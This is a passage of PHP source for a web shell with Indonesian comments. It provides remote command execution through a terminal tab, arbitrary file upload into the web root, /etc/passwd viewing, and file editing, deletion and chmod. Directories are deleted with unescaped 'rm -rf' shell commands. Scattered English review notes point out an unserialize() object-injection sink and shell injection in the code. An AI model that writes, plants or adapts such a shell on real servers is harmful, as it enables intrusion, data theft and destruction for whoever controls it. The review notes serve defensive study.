Hosts FileView /etc/passwdNot Readable
'; } } // ========== TAB-TAB LAINNYA ========== // Tab Upload (dari kode asli) elseif($_GET['do'] == 'upload') { echo '
File Upload
'; if(isset($_POST['upload'])) { echo '
'; if($_POST['tipe_upload'] == 'biasa') { if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) { echo '
Uploaded to: '.$dir.'/'.$_FILES['ix_file']['name'].'
'; } else { echo '
Failed to upload file
'; } } else { $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name']; $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name']; if(is_writable($_SERVER['DOCUMENT_ROOT'])) { if(@copy($_FILES['ix_file']['tmp_name'], $root)) { echo '
Uploaded to: '.$root.'
Open: http://'.$web.'
'; } else { echo '
Failed to upload file
'; } } else { echo '
Document root is not writable
'; } } echo '
'; } echo '
'; } // Tab Command Terminal (dari kode asli) elseif($_GET['do'] == 'cmd') { echo '
Terminal
'; if(isset($_POST['do_cmd'])) { echo '
'.exe($_POST['cmd']).'
'; } // Quick commands echo '
Quick Commands:
'; } // Tab Recursive Scan (dari kode asli) elseif($_GET['do'] == 'scan') { echo '
Recursive Directory Scanner
'; echo '
'; if(isset($_POST['do_scan'])) { $scan_dir = $_POST['scan_dir']; $extensions = array_map('trim', explode(',', $_POST['scan_ext'])); $extensions = array_filter($extensions); $max_depth = intval($_POST['scan_depth']); echo '
Scanning directory: '.$scan_dir.'
Extensions: '.($extensions ? implode(', ', $extensions) : 'All files').' | Max Depth: '.$max_depth.'
'; if(is_dir($scan_dir) && is_readable($scan_dir)) { $start_time = microtime(true); $files = recursiveScan($scan_dir, $extensions, $max_depth); $end_time = microtime(true); $scan_time = round($end_time - $start_time, 3); echo '
Found '.count($files).' files in '.$scan_time.' seconds
'; if(!empty($files)) { echo '
'; $counter = 1; foreach ($files as $file) { if($counter > 100) { // Limit display to 100 files echo ''; break; } $size = formatSize($file); $dir_path = dirname($file); echo ''; $counter++; } echo '
# File Path Size Actions
... and '.(count($files) - 100).' more files
'.$counter.' '.$file.' '.$size.'
'; // Export options echo '
Export Results:
'; } } else { echo '
Cannot read directory: '.$scan_dir.'
';
    }
}
// Handle export
// Builds a plain-text listing from a file list that the browser posts back
// and sends it as a download named scan_results_<timestamp>.txt.
if(isset($_POST['export_txt'])) {
    // NOTE(review): unserialize() on request data. The payload is whatever
    // the client sends in export_files, so this is a PHP object-injection
    // sink: any class loaded in the process with magic methods can be
    // instantiated by the sender. A list of paths needs no object support;
    // json_decode() is the safe format for this kind of round-trip.
    // The return value is also not checked (unserialize() yields false on
    // malformed input) before it is counted and iterated below.
    $files = unserialize($_POST['export_files']);
    $export_content = "Recursive Scan Results\n";
    $export_content .= "Date: ".date('Y-m-d H:i:s')."\n";
    // scan_dir is copied from the request into the report as-is; the
    // response is declared text/plain below.
    $export_content .= "Directory: ".$_POST['scan_dir']."\n";
    $export_content .= "Files Found: ".count($files)."\n\n";
    foreach ($files as $index => $file) {
        $export_content .= ($index+1).". ".$file."\n";
    }
    header('Content-Type: text/plain');
    header('Content-Disposition: attachment; filename="scan_results_'.date('Ymd_His').'.txt"');
    echo $export_content;
    // Stop here so nothing after the report is appended to the download.
    exit;
}
echo '
'; } // ========== FILE MANAGER DAN OPERASI FILE LAINNYA ========== // Current Directory Navigation (untuk semua halaman kecuali yang sudah di-handle) elseif(!in_array($_GET['do'] ?? '', ['home', 'fileops', 'jumping', 'grab', 'scan', 'archive', 'system', 'upload', 'cmd'])) { // Handle file operations dari kode asli if (isset($_GET['file']) && !empty($_GET['file']) && isset($_GET['act']) && $_GET['act'] == 'download') { $file = basename($_GET['file']); $filePath = __DIR__ . '/' . $file; if (file_exists($filePath)) { ob_end_clean(); header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($filePath) . '"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($filePath)); readfile($filePath); exit; } else { die("
Error: File tidak ditemukan!
"); } } elseif(isset($_GET['act']) && $_GET['act'] == 'newfile') { if(isset($_POST['new_save_file'])) { $newfile = htmlspecialchars($_POST['newfile']); $fopen = fopen($newfile, "a+"); if($fopen) { $act = ""; } else { $act = "permission denied"; } echo $act; } echo '

Buat File Baru

'; } elseif(isset($_GET['act']) && $_GET['act'] == 'newfolder') { if(isset($_POST['new_save_folder'])) { $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']); if(!mkdir($new_folder)) { $act = "permission denied"; } else { $act = ""; } echo $act; } echo '

Buat Folder Baru

'; } elseif(isset($_GET['act']) && $_GET['act'] == 'rename_dir') { if(isset($_POST['dir_rename'])) { $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename']).""); if($dir_rename) { $act = ""; } else { $act = "permission denied"; } echo "".$act."
"; } echo '

Ubah Nama Folder

';
}
// Directory delete action (act=delete_dir).
// Defender note: a single GET request triggers a recursive delete of $dir;
// there is no confirmation step or request token visible in this branch.
// $dir is set outside this span (presumably from the request - confirm
// against the top of the file).
elseif(isset($_GET['act']) && $_GET['act'] == 'delete_dir') {
    if(is_dir($dir)) {
        if(is_writable($dir)) {
            // Three attempts in a row, regardless of platform or of whether
            // an earlier one succeeded: PHP rmdir(), then a Unix and a
            // Windows command line passed to exe() (defined elsewhere;
            // presumably a shell-execution wrapper).
            @rmdir($dir);
            // NOTE(review): $dir is interpolated into both command strings
            // without escapeshellarg(), so its value is parsed by the shell.
            @exe("rm -rf $dir");
            @exe("rmdir /s /q $dir");
            // Success is assumed; none of the three results is checked.
            $act = "";
        } else {
            $act = "could not remove ".basename($dir)."";
        }
    }
    // $act is only assigned inside the is_dir() branch above.
    echo $act;
}
// File view action (act=view); the markup it prints follows.
elseif(isset($_GET['act']) && $_GET['act'] == 'view') {
    echo '

File: ' . htmlspecialchars(basename($_GET['file'])) . '

View Edit Rename Download Delete
'; } elseif (isset($_GET['file']) && !empty($_GET['file']) && isset($_GET['act']) && $_GET['act'] == 'chmod_file') { $file = $_GET['file']; $dir = $_GET['dir'] ?? dirname($file); $current_perm = substr(sprintf('%o', fileperms($file)), -4); // Ambil permission saat ini dalam format oktal if (isset($_POST['new_perm'])) { $new_perm = $_POST['new_perm']; if (preg_match('/^[0-7]{3}$/', $new_perm)) { // Validasi izin harus dalam format oktal 3 digit $chmod_result = chmod($file, octdec($new_perm)); $msg = $chmod_result ? "✅ Permission berhasil diubah menjadi $new_perm!" : "❌ Gagal mengubah permission!"; $current_perm = substr(sprintf('%o', fileperms($file)), -4); // Update permission setelah chmod } else { $msg = "❌ Format permission tidak valid! Gunakan format 3 digit (misal: 755)."; } } echo '
'; echo '

🛠 Ganti Permission (chmod) File

'; echo isset($msg) ? "

$msg

" : ""; echo '

📂 File: ' . htmlspecialchars($file) . '

'; echo '

📍 Path: ' . htmlspecialchars($dir) . '

'; echo '

🔑 Permission Saat Ini: ' . $current_perm . '

'; echo '
'; echo ''; echo ''; echo ''; echo '
'; echo '
🔙 Kembali'; echo '
'; } elseif (isset($_GET['dir']) && !empty($_GET['dir']) && isset($_GET['act']) && $_GET['act'] == 'chmod_dir') { $dir = $_GET['dir']; $current_perm = substr(sprintf('%o', fileperms($dir)), -4); if (isset($_POST['new_perm'])) { $new_perm = $_POST['new_perm']; if (preg_match('/^[0-7]{3}$/', $new_perm)) { $chmod_result = chmod($dir, octdec($new_perm)); $msg = $chmod_result ? "✅ Permission berhasil diubah menjadi $new_perm!" : "❌ Gagal mengubah permission!"; $current_perm = substr(sprintf('%o', fileperms($dir)), -4); } else { $msg = "❌ Format permission tidak valid! Gunakan format 3 digit (misal: 755)."; } } echo '
'; echo '

🛠 Ganti Permission (chmod) Direktori

'; echo isset($msg) ? "

$msg

" : ""; echo '

📂 Direktori: ' . htmlspecialchars($dir) . '

'; echo '

🔑 Permission Saat Ini: ' . $current_perm . '

'; echo '
'; echo ''; echo ''; echo ''; echo '
'; echo '
🔙 Kembali'; echo '
'; } elseif(isset($_GET['act']) && $_GET['act'] == 'edit') { if (isset($_POST['save'])) { $save = file_put_contents($_GET['file'], $_POST['src']); if ($save) { $act = ''; } else { $act = ''; } echo $act; } echo '

File: ' . htmlspecialchars(basename($_GET['file'])) . '

View Edit Rename Download Delete
'; } elseif(isset($_GET['act']) && $_GET['act'] == 'rename') { if (isset($_POST['do_rename'])) { $new_name = htmlspecialchars($_POST['rename']); $rename = rename($_GET['file'], "$dir/$new_name"); if ($rename) { echo ""; exit; } else { echo ''; } } echo '

Rename File

View Edit Rename Download Delete
'; } elseif(isset($_GET['act']) && $_GET['act'] == 'delete') { $delete = unlink($_GET['file']); if($delete) { $act = ""; } else { $act = "permission denied"; } echo $act; } // File Manager (Default View) else { // Current Directory Navigation echo '
'; echo '
New File New Folder '.w($dir, perms($dir)).'
'; echo '
File Manager
'.count(glob("$dir/*")).' items
'; if(is_dir($dir) && is_readable($dir)) { echo ''; // Parent directory link if($dir != "/") { $parent = dirname($dir); echo ''; } $scandir = scandir($dir); $folders = []; $files = []; foreach($scandir as $item) { if($item == '.' || $item == '..') continue; if(is_dir("$dir/$item")) { $folders[] = $item; } else { $files[] = $item; } } // Display folders first foreach($folders as $folder) { $ftime = date("Y-m-d H:i", @filemtime("$dir/$folder")); echo ''; } // Display files foreach($files as $file) { $ftime = date("Y-m-d H:i", @filemtime("$dir/$file")); $size = formatSize("$dir/$file"); $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); // Set icon based on file extension $icon = 'bi-file-earmark'; $color = 'text-info'; if(in_array($ext, ['php', 'html', 'htm', 'js', 'css'])) { $icon = 'bi-file-code'; $color = 'text-success'; } elseif(in_array($ext, ['jpg', 'jpeg', 'png', 'gif', 'bmp'])) { $icon = 'bi-file-image'; $color = 'text-warning'; } elseif(in_array($ext, ['zip', 'rar', 'tar', 'gz'])) { $icon = 'bi-file-zip'; $color = 'text-danger'; } echo ''; } echo '
Name Size Modified Permissions Actions
Parent Directory
'.$folder.' DIR '.$ftime.' '.w("$dir/$folder", perms("$dir/$folder")).'
'.$file.' '.$size.' '.$ftime.' '.w("$dir/$file", perms("$dir/$file")).'
'; } else { echo '
Cannot open directory. (Not readable)
'; } echo '
';
    }
}
// Logout Handler
// Removes one session entry whose key is the MD5 of the request's Host
// header (presumably the marker the login check sets - the login code is
// not in this span). Because the key is derived from HTTP_HOST, the same
// deployment reached under a different host name uses a different key.
// The comparison is loose, so any truthy "logout" query value triggers it;
// the parameter is read without an isset() guard.
if($_GET['logout'] == true) {
    unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
    echo "";
}
// Footer
echo '';
echo ''; // Close container
?>